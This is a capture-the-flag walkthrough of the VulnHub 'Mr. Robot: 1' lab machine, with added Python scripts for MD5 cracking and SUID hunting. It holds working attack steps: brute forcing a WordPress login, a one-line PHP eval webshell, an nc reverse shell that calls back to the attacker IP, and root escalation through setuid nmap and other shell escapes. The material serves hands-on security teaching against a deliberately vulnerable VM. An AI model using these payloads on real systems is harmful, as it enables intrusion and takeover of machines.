Lab VM download: Mr. Robot: 1 ~ VulnHub
Contents
1. Host discovery
2. Port scanning
3. Fingerprint scanning
4. Directory scanning
5. Brute forcing with Burp
6. Webshell upload
7. Reverse shell
8. Privilege escalation via find and SUID
9. Summary
Background (from the VulnHub description): This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively harder to find.
The VM is not too difficult. No advanced exploitation or reverse engineering of any kind is required. The level is considered Beginner-Intermediate.
Attacker IP: 192.168.179.131 (Kali)
Target IP: 192.168.179.116 (Ubuntu)
Goal: recover the three keys (flags) on the target
1. Host discovery
First use nmap to sweep the whole /24 and locate the target; it turns out to be 192.168.179.116.
2. Port scanning
Scan all ports; the scan reports 22, 80 and 443.
Map each port to its service (SSH on 22, HTTP on 80, HTTPS on 443) and look for likely weaknesses in each.
3. Fingerprint scanning
whatweb ships with Kali, so nothing needs to be downloaded; use it to fingerprint the web server and whatever CMS it exposes:
whatweb 192.168.179.116
4. Directory scanning
Enumerate directories and files with dirb:
dirb http://192.168.179.116 /usr/share/dirb/wordlists/big.txt
Look at the important hits first. robots.txt lists two entries: the first key (flag1) and a wordlist.
Opening flag1 shows a string that looks like an MD5 hash; trying to crack it gets nowhere, which is expected, since it is the key itself rather than a hash of something else.
fsocity.dic can be downloaded; it is a wordlist, presumably of usernames or passwords.
5. Brute forcing with Burp
The directory scan above turned up the login page http://192.168.179.116/wp-login (WordPress), so try the downloaded wordlist against it.
Submitting an arbitrary username shows that WordPress reports a non-existent username differently from a wrong password. That leaks which usernames exist, so the username can be brute-forced first with Burp, and then the password for that username.
Brute-force the username first, using the downloaded fsocity.dic.
A handful of usernames come back as valid.
Then brute-force the password for that username. The wordlist is very large and most of its lines are repeated, so deduplicate it first; the run goes much faster.
With the final username and password, log in at the login page; the login succeeds:
- Username: elliot
- Password: ER28-0652
6. Webshell upload
With an account on the WordPress site, find a theme template that can be edited from the dashboard and insert a one-line PHP webshell:
<?php @eval($_POST['code']); ?>
Then connect to it remotely with AntSword (the POST parameter name, code, is the connection password).
7. Reverse shell
AntSword's virtual terminal is awkward to work in, so bounce a shell back to Kali instead.
Start the nc listener on Kali first:
nc -lvp 4444
Then run this on the target through the webshell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.179.131 4444 >/tmp/f
Upgrade the shell to an interactive TTY so that su and editors work:
python -c 'import pty; pty.spawn("/bin/bash")'
List the files in the current directory and check the current user. Under the robot user's home directory are flag2 and an MD5 hash of robot's password.
flag2 is not readable by the current (web server) user; there is no permission.
So crack the MD5 hash instead (it is a hash, not encryption, so the attack is a dictionary search, not decryption).
That yields robot's password; switch to robot with su and read flag2:
- Username: robot
- Password: abcdefghijklmnopqrstuvwxyz
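The "decryption" step is really a dictionary attack against an unsalted hash: hash each candidate and compare. The following is an added example for this walkthrough, not code from the original post. The hash line is constructed to reproduce the result above (it is the MD5 of the lowercase alphabet, which is also the RFC 1321 test vector), and the `user:hash` file layout and the mini-wordlist are assumptions.

```python
"""Dictionary attack on the raw MD5 hash left in robot's home directory.

Added example for this walkthrough, not code from the original page.
The hash line below is constructed to reproduce the walkthrough's
result: it is the MD5 of the lowercase alphabet (the RFC 1321 test
vector). The 'user:hash' layout and the mini-wordlist are assumptions.
"""
import hashlib
import sys
from typing import Dict, Iterable, Optional

# Constructed sample in the shape of a raw-MD5 password file.
SAMPLE_HASH_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
# Constructed mini-wordlist standing in for fsocity.dic.
SAMPLE_WORDLIST = ["password", "elliot", "abcdefghijklmnopqrstuvwxyz", "fsociety"]


def parse_hash_file(text: str) -> Dict[str, str]:
    """Read 'user:hexdigest' lines; ignore blank lines and anything that
    is not a 32-hex-digit raw MD5 value."""
    hashes = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.strip().split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            hashes[user.strip()] = digest
    return hashes


def md5_hex(word: str) -> str:
    """Hex MD5 of one candidate password."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack(digest: str, words: Iterable[str]) -> Optional[str]:
    """Return the first word whose MD5 equals digest, else None.
    Raw (unsalted) MD5 means one cheap hash per candidate and nothing
    per-user to slow the attacker down, which is why a wordlist suffices."""
    digest = digest.lower()
    for w in words:
        w = w.rstrip("\r\n")
        if md5_hex(w) == digest:
            return w
    return None


def crack_file(text: str, words: Iterable[str]) -> Dict[str, Optional[str]]:
    """Crack every hash in a raw-MD5 password file against one wordlist."""
    candidates = list(words)          # materialise so it can be reused per user
    return {user: crack(digest, candidates)
            for user, digest in parse_hash_file(text).items()}


if __name__ == "__main__":
    # usage: python3 crack_md5.py password-file fsocity.dic
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as hf, open(sys.argv[2], errors="replace") as wf:
            print(crack_file(hf.read(), wf))
    else:
        print(crack_file(SAMPLE_HASH_FILE, SAMPLE_WORDLIST))
```

For a real wordlist the same job is normally given to john (`--format=raw-md5`) or hashcat (`-m 0`); the script just makes the mechanism visible.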
8. Privilege escalation via find and SUID
Search for setuid-root programs that can be abused; nmap shows up in the list, so use it to run commands as root:
find / -perm -u=s -type f 2>/dev/null
Run nmap --interactive to get nmap's interactive prompt (this mode exists only in old nmap releases, such as the one on this VM; current versions have removed it), then type !sh to spawn a shell. Because of the setuid bit, the shell runs as root, so the escalation succeeds. Check the root directory, read flag3, and the walkthrough is complete.
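The find command above lists every setuid file; the real work is deciding which of them can be turned into a shell. The following is an added example for this walkthrough, not code from the original post: it reproduces the find search in Python and then matches hits against a small, hand-picked table of binaries with documented SUID shell escapes (nmap as used above, plus two well-known GTFOBins entries). The table and the list of pseudo-filesystems to skip are assumptions and are far from complete.

```python
"""Hunt for setuid binaries and flag the ones with a known shell escape.

Added example for this walkthrough, not code from the original page.
It does what `find / -perm -u=s -type f 2>/dev/null` does, then checks
each hit's basename against a short, hand-picked table of binaries whose
SUID shell escapes are documented. The table is an assumption.
"""
import os
import stat
import sys
from typing import Dict, Iterable, Iterator, List, Tuple

# basename -> how to turn the setuid bit into a root shell
SHELL_ESCAPES: Dict[str, str] = {
    "nmap": "nmap --interactive, then !sh  (old nmap releases only, as on this VM)",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "bash": "bash -p",
}

# Mounts that hold no real binaries; skipped like 2>/dev/null hides their errors.
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def is_suid(mode: int) -> bool:
    """True for a regular file with the setuid bit set (find's -type f -perm -u=s)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def _is_pseudo(dirpath: str) -> bool:
    return any(dirpath == p or dirpath.startswith(p + "/") for p in PSEUDO_FS)


def find_suid(root: str = "/") -> Iterator[str]:
    """Yield every setuid regular file under root; unreadable directories
    are skipped silently."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        if _is_pseudo(dirpath):
            dirnames[:] = []          # do not descend into pseudo filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink's own mode is never setuid
            except OSError:
                continue
            if is_suid(st.st_mode):
                yield path


def triage(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Pair each setuid path whose basename is in SHELL_ESCAPES with its escape."""
    hits = []
    for p in paths:
        base = os.path.basename(p)
        if base in SHELL_ESCAPES:
            hits.append((p, SHELL_ESCAPES[base]))
    return hits


if __name__ == "__main__":
    # usage: python3 suid_hunt.py [root]
    start = sys.argv[1] if len(sys.argv) > 1 else "/"
    found = list(find_suid(start))
    for p in found:
        print(p)
    for p, how in triage(found):
        print("candidate:", p, "->", how)
```

Anything that is setuid and not in the table still deserves a look; the table only shortcuts the obvious cases, and a custom setuid binary (the common CTF twist) has to be read by hand.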
9. Summary
- Various uses of nmap
- Using Burp, AntSword and similar tools
- Reverse shells
- Privilege escalation via find and SUID binaries